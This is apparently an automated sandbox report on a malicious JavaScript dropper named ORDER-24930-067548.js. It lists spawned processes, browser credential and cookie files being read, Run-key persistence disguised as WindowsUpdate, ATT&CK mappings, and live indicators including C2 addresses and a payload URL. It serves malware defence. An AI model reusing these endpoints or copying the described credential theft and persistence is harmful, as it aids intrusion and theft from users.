              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: GeUT.exe, 00000005.00000002.2743028060.000000000311B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Users\user\AppData\Local\Temp\GeUT.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exe, Queries volume information: C:\Users\user\AppData\Roaming\Service.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Service.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: GeUT.exe.3.dr, Program.cs, .Net Code: TaskMan
              Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs, .Net Code: TaskMan
              Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs, .Net Code: TaskMan
              Source: Service.exe.4.dr, Program.cs, .Net Code: TaskMan
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match, File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Source: Yara match, File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 3120, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 6884, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 5664, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: Service.exe PID: 2668, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite

              Remote Access Functionality

              Source: Yara match, File source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 3032, type: MEMORYSTR
              Source: Yara match, File source: 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 3120, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 6884, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: GeUT.exe PID: 5664, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: Service.exe PID: 2668, type: MEMORYSTR
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | 31 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 31 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 212 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 11 Registry Run Keys / Startup Folder | 11 Registry Run Keys / Startup Folder | 3 Obfuscated Files or Information | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 111 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 131 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
              | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 212 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

              Behavior Graph ID: 1523152, Sample: ORDER-24930-067548.js, Startdate: 01/10/2024, Architecture: WINDOWS, Score: 100

              | Source | Detection | Scanner | Label |
              |---|---|---|---|
              | ORDER-24930-067548.js | 30% | Virustotal | |
              | ORDER-24930-067548.js | 26% | ReversingLabs | Script-JS.Trojan.Cryxos |
              | Source | Detection | Scanner | Label |
              |---|---|---|---|
              | C:\Users\user\AppData\Local\Temp\GeUT.exe | 100% | Avira | TR/Dropper.Gen |
              | C:\Users\user\AppData\Local\Temp\OLWJMU.js | 100% | Avira | JS/Dldr.G17 |
              | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js | 100% | Avira | JS/Dldr.G17 |
              | C:\Users\user\AppData\Roaming\Service.exe | 100% | Avira | TR/Dropper.Gen |
              | C:\Users\user\AppData\Local\Temp\GeUT.exe | 100% | Joe Sandbox ML | |
              | C:\Users\user\AppData\Roaming\Service.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              | Source | Detection | Scanner | Label |
              |---|---|---|---|
              | https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
              | https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
              | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
              | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
              | https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
              | https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe |
              | https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
              | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
              | https://support.mozilla.org | 0% | URL Reputation | safe |
              | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              | https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
              | https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | |
              | http://james.newtonking.com/projects/json | 0% | Virustotal | |
              | https://urn.to/r/sds_seeaCould | 0% | Virustotal | |
              | https://www.newtonsoft.com/jsonschema | 0% | Virustotal | |
              | 194.37.97.150 | 1% | Virustotal | |
              | https://urn.to/r/sds_see | 0% | Virustotal | |
              | https://github.com/LimerBoy/StormKitty | 1% | Virustotal | |
              | as525795.duckdns.org | 2% | Virustotal | |
              | https://www.nuget.org/packages/Newtonsoft.Json.Bson | 0% | Virustotal | |
              No contacted domains info
              | Name | Malicious | Antivirus Detection | Reputation |
              |---|---|---|---|
              | http://192.210.215.11/zoom/cc.js | true | | unknown |
              | as525795.duckdns.org | true | | unknown |
              | 194.37.97.150 | true | | unknown |
              | Name | Source | Malicious | Antivirus Detection | Reputation |
              |---|---|---|---|---|
              | https://duckduckgo.com/chrome_newtab | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | http://192.210.215.11/zoom/cc.j | wscript.exe, 00000000.00000003.1467024468.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1475994870.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1465964784.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466406423.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown |
              | https://duckduckgo.com/ac/?q= | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | https://www.google.com/images/branding/product/ico/googleg_lodp.ico | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | | unknown |
              | https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l | places.raw.5.dr | false | | unknown |
              | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | https://www.ecosia.org/newtab/ | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | places.raw.5.dr | false | URL Reputation: safe | unknown |
              | https://urn.to/r/sds_seeaCould | GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
              | http://go.mic | GeUT.exe, 00000015.00000002.1819069957.0000000000925000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
              | http://james.newtonking.com/projects/json | GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
              | https://ac.ecosia.org/autocomplete?q= | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | http://192.210.215.11/zoom/cc.jst | wscript.exe, 00000000.00000002.1473794151.000002BDDF0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466505372.000002BDDF0C0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
              | https://github.com/LimerBoy/StormKitty | GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp | false | | unknown |
              | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr | false | URL Reputation: safe | unknown |
              | https://www.newtonsoft.com/jsonschema | GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
              | https://www.nuget.org/packages/Newtonsoft.Json.Bson | GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp | false | | unknown |
              | https://support.mozilla.org | places.raw.5.dr | false |
                        • URL Reputation: safe
                        unknown
                        https://urn.to/r/sds_seeGeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameGeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drfalse
                        • URL Reputation: safe
                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
192.210.215.11 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
194.37.97.150 | unknown | Romania | 43913 | AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1523152
                        Start date and time:2024-10-01 07:37:14 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 58s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:34
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (Javascript)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:ORDER-24930-067548.js
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winJS@52/22@0/2
                        EGA Information:
                        • Successful, ratio: 23.1%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 504
                        • Number of non-executed functions: 2
                        Cookbook Comments:
                        • Found application associated with file extension: .js
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target GeUT.exe, PID 3672 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 3772 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5072 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5252 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5300 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5664 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 5812 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 6148 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 6764 because it is empty
                        • Execution Graph export aborted for target GeUT.exe, PID 6960 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 1280 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 1344 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 1656 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 2772 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 3040 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 3184 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 4152 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 4352 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 4620 because it is empty
                        • Execution Graph export aborted for target Service.exe, PID 6324 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:38:22 | API Interceptor | 2486182x Sleep call for process: GeUT.exe modified
07:38:21 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
07:38:29 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
07:38:38 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
07:38:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
192.210.215.11 | ORDER-249034489.XLS.js | malicious | WSHRat | 192.210.215.11/zoom/tm.vbs
192.210.215.11 | ORDER-2490407.PDF.js | malicious | STRRAT | 192.210.215.11/zoom/java.js
192.210.215.11 | MACHINE_SPECIFICATION.js | malicious | WSHRat | 192.210.215.11/zoom/tm.vbs
192.210.215.11 | Bukti-Transfer.vbs | malicious | Snake Keylogger, VIP Keylogger | 192.210.215.11/zoom/aus1.js
192.210.215.11 | PURCHASE_ORDER.js | malicious | AsyncRAT | 192.210.215.11/zoom/asyn.js
192.210.215.11 | Invoice-No35197QASD.vbs | malicious | Snake Keylogger, VIP Keylogger | 192.210.215.11/zoom/au2.js
192.210.215.11 | Faktur-Pajak..vbs | malicious | Unknown | 192.210.215.11/zoom/aus1.js
192.210.215.11 | Faktur-Pajak..vbs | malicious | Unknown | 192.210.215.11/zoom/aus1.js
192.210.215.11 | Ref_87021929821US20240709031221656.js | malicious | Nanocore | 192.210.215.11/zoom/nano.js
192.210.215.11 | INVOICE-..js | malicious | Snake Keylogger, VIP Keylogger | 192.210.215.11/zoom/au.js
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | AE1169-0106202.xls | malicious | Snake Keylogger | 172.245.123.9
AS-COLOCROSSINGUS | 5UQ2Xybm0q.hta | malicious | Cobalt Strike, Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | PI#0034250924.xla.xlsx | malicious | FormBook | 104.168.7.7
AS-COLOCROSSINGUS | SYSN ORDER.xls | malicious | Snake Keylogger | 172.245.123.6
AS-COLOCROSSINGUS | PI#0034250924.xla.xlsx | malicious | Unknown | 104.168.7.7
AS-COLOCROSSINGUS | PI#0034250924.xla.xlsx | malicious | Unknown | 104.168.7.7
AS-COLOCROSSINGUS | PO 11001 .xls | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | ZIXBhdgf6y.exe | malicious | Remcos | 192.3.101.137
AS-COLOCROSSINGUS | http://jeevankiranfoundationcenter.co.in/css/rrp.htm | malicious | Kutaki | 23.94.221.14
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | SG2MZDAaW4.elf | malicious | Mirai | 194.37.64.64
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | huhu.mips.elf | malicious | Mirai, Okiru | 194.37.64.26
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | jew.x86.elf | malicious | Mirai | 194.37.64.28
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | leOsd0cFAr.elf | malicious | Mirai | 194.37.64.43
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | oHqZ0zT7DZ.elf | malicious | Mirai | 194.37.64.57
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | ORDER-230733AF.pdf.vbs | malicious | WSHRat, AgentTesla | 194.37.97.161
AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT | QDXi1OHfgf.elf | malicious | Mirai, Moobot | 194.37.64.209
